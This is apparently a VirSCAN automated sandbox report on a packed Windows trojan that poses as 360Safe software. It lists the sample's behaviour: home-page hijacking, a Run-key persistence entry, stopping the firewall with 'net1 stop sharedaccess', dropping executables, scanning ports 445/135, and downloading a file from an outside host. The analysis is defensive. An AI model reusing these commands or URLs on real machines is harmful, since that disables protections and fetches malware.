VirSCAN

File information
Safety rating:20
Behavior list
Basic Information
MD5: 01834901c019f66fe9394c1d2778f30f
File type: EXE
Production company: 360Safe.com
Version: 1.0.0.1---2, 0, 0, 1002
Shell or compiler information: PACKER:UPX V2.00-V3.00 -> Markus Oberhumer & Laszlo Molnar & John Reiser [Overlay] *
Subfile information: upx30_9adcce69dumpFile / 50d02a764440e883837df112b9e7071b / EXE
Key behavior
Behavior description:Modify registry_IE home page
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description:Hide specified window
details:[Window,Class] = [C:\Program Files\IPO.hta,HTML Application Host Window Class]
Behavior description:Get host address by name
details:computer
219.133.40.1
219.133.40.2
219.133.40.3
219.133.40.4
219.133.40.5
219.133.40.6
219.133.40.7
219.133.40.8
219.133.40.9
219.133.40.10
219.133.40.11
Behavior description:Kill process
details:TargetProcess = COIOME.EXE /F
Behavior description:Stop system service
details:ServiceName = Windows Firewall/Internet Connection Sharing (ICS)
Behavior description:Open file mapping with write access
details:CiceroSharedMemDefaultS-*
Local\UrlZonesSM_Administrator
DfSharedHeap3D4550
\WINDOWS\system32\zh-cn\wshext.dll.mui
Local\!PrivacIE!SharedMem!Counter
\WINDOWS\system32\zh-cn\ieframe.dll.mui
\WINDOWS\system32\zh-cn\wshom.ocx.mui
\WINDOWS\system32\zh-cn\cscript.exe.mui
DfSharedHeap3EB0CE
DfSharedHeap3EC327
DfSharedHeap3ED4ED
DfSharedHeap3EE810
DfSharedHeap3EFC76
Behavior description:Set special folder attributes
details:C:\Program Files\Common Files\sebsbvx
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:Modify registry_startup item
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\safe360
Process behavior
Behavior description:Create process with hidden window
details:ImagePath = c:\windows\system32\mshta.exe, CmdLine = "c:\windows\system32\mshta.exe" "c:\program files\ipo.hta"
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config browser start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config lanmanserver start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config lanmanworkstation start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config lmhosts start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config rpclocator start= auto
ImagePath = c:\windows\system32\sc.exe, CmdLine = "c:\windows\system32\sc.exe" config ntlmssp start= auto
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start lanmanserver
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start lanmanworkstation
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start browser
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" stop sharedaccess
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start lmhosts
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start rpclocator
ImagePath = c:\windows\system32\net1.exe, CmdLine = "c:\windows\system32\net1.exe" start ntlmssp
Behavior description:Create process
details:ImagePath = C:\WINDOWS\system32\mshta.exe, CmdLine = "C:\WINDOWS\system32\mshta.exe" "C:\Program Files\IPO.hta"
ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = cmd /c taskkill /im coiome.exe /f
ImagePath = C:\WINDOWS\system32\taskkill.exe, CmdLine = taskkill /im coiome.exe /f
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config Browser start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config lanmanserver start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config lanmanworkstation start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config LmHosts start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config RpcLocator start= auto
ImagePath = C:\WINDOWS\system32\sc.exe, CmdLine = "C:\WINDOWS\system32\sc.exe" config NtLmSsp start= auto
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start lanmanserver
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start lanmanworkstation
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start Browser
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" stop sharedaccess
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start LmHosts
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = "C:\WINDOWS\system32\net1.exe" start RpcLocator
Behavior description:Create process from newly created file
details:ImagePath = C:\Program Files\Common Files\sebsbvx\coiome.exe, CmdLine = "C:\Program Files\Common Files\sebsbvx\coiome.exe"
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.1 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.2 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.3 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.4 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.5 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.6 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.7 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.8 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.9 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.10 :
ImagePath = C:\WINDOWS\Tasks\HEJg.exe, CmdLine = C:\WINDOWS\Tasks\HEJg.exe 219.133.40.11 :
Behavior description:Enumerate processes
details:N/A
Behavior description:Kill process
details:TargetProcess = COIOME.EXE /F
File behavior
Behavior description:Create executable file
details:C:\Program Files\Common Files\sebsbvx\coiome.exe
C:\WINDOWS\Tasks\HEJg.exe
Behavior description:Find file
details:FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\My Documents
FileName = C:\Documents and Settings\All Users
FileName = C:\Documents and Settings\All Users\Documents
FileName = C:\Documents and Settings\Administrator\桌面
FileName = C:\Documents and Settings\All Users\桌面
FileName = C:\Program Files\IPO.hta
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\system32\mshta.exe
FileName = C:\WINDOWS\system32\cmd.exe
FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
Behavior description:Open file mapping with write access
details:CiceroSharedMemDefaultS-*
Local\UrlZonesSM_Administrator
DfSharedHeap3D4550
\WINDOWS\system32\zh-cn\wshext.dll.mui
Local\!PrivacIE!SharedMem!Counter
\WINDOWS\system32\zh-cn\ieframe.dll.mui
\WINDOWS\system32\zh-cn\wshom.ocx.mui
\WINDOWS\system32\zh-cn\cscript.exe.mui
DfSharedHeap3EB0CE
DfSharedHeap3EC327
DfSharedHeap3ED4ED
DfSharedHeap3EE810
DfSharedHeap3EFC76
Behavior description:Set special folder attributes
details:C:\Program Files\Common Files\sebsbvx
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior description:Modify file contents
details:C:\Program Files\IPO.hta---> Offset = 0
C:\WINDOWS\Tasks\HEJi.vbe---> Offset = 0
Behavior description:Modify newly created executable file
details:C:\Program Files\Common Files\sebsbvx\coiome.exe---> Offset = 90112
Network behavior
Behavior description:Open URL over the network
details:InternetOpenUrlA: http://tj.qq16800.com/t/Count.asp?mac=&ver=01&t=computer hInternet = 0x00000254
Behavior description:Establish connection to a specified socket
details:219.133.40.1:445
219.133.40.1:135
Behavior description:Download file
details:URLDownloadToFileW: http://j.qq16800.com/b.jpg ---> C:\WINDOWS\Fonts\oi.ini
C:\WINDOWS\Fonts\oi.ini
Behavior description:Get host address by name
details:computer
219.133.40.1
219.133.40.2
219.133.40.3
219.133.40.4
219.133.40.5
219.133.40.6
219.133.40.7
219.133.40.8
219.133.40.9
219.133.40.10
219.133.40.11
Registry behavior
Behavior description:Modify registry
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\mshta.exe
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\sc.exe
\REGISTRY\USER\S-*\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\net1.exe
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\
Behavior description:Modify registry_pending file rename entries
details:\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Session Manager\PendingFileRenameOperations
Behavior description:Modify registry_IE home page
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Start Page
Behavior description:Modify registry_IE key settings
details:\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\Search Page
\REGISTRY\USER\S-*\Software\Microsoft\Internet Explorer\Main\default_page_url
Behavior description:Modify registry_startup item
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\safe360
Other behavior
Behavior description:Create mutex
details:CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
SHIMLIB_LOG_MUTEX
Local\!PrivacIE!SharedMemory!Mutex
Behavior description:Hide specified window
details:[Window,Class] = [C:\Program Files\IPO.hta,HTML Application Host Window Class]
Behavior description:Find specified window
details:NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [,]
Behavior description:Start system service
details:[Service already running]: LocalSystem, Server, C:\WINDOWS\system32\svchost.exe -k netsvcs
[Service already running]: LocalSystem, Workstation, C:\WINDOWS\system32\svchost.exe -k netsvcs
[Service already running]: LocalSystem, Computer Browser, C:\WINDOWS\system32\svchost.exe -k netsvcs
[Service already running]: NT AUTHORITY\LocalService, TCP/IP NetBIOS Helper, C:\WINDOWS\system32\svchost.exe -k LocalService
[Service started successfully]: NT AUTHORITY\NetworkService, Remote Procedure Call (RPC) Locator, C:\WINDOWS\system32\locator.exe
[Service started successfully]: LocalSystem, NT LM Security Support Provider, C:\WINDOWS\system32\lsass.exe
Behavior description:Acquire system privileges
details:SE_DEBUG_PRIVILEGE
SE_LOAD_DRIVER_PRIVILEGE
Behavior description:Get TickCount value
details:TickCount = 493265, SleepMilliseconds = 4000.
Behavior description:Enumerate windows
details:N/A
Behavior description:Stop system service
details:ServiceName = Windows Firewall/Internet Connection Sharing (ICS)
Behavior description:Call Sleep function
details:[1]: MilliSeconds = 1000.
[2]: MilliSeconds = 1000.
[3]: MilliSeconds = 2000.
[4]: MilliSeconds = 4000.
[5]: MilliSeconds = 4000.
Run screenshot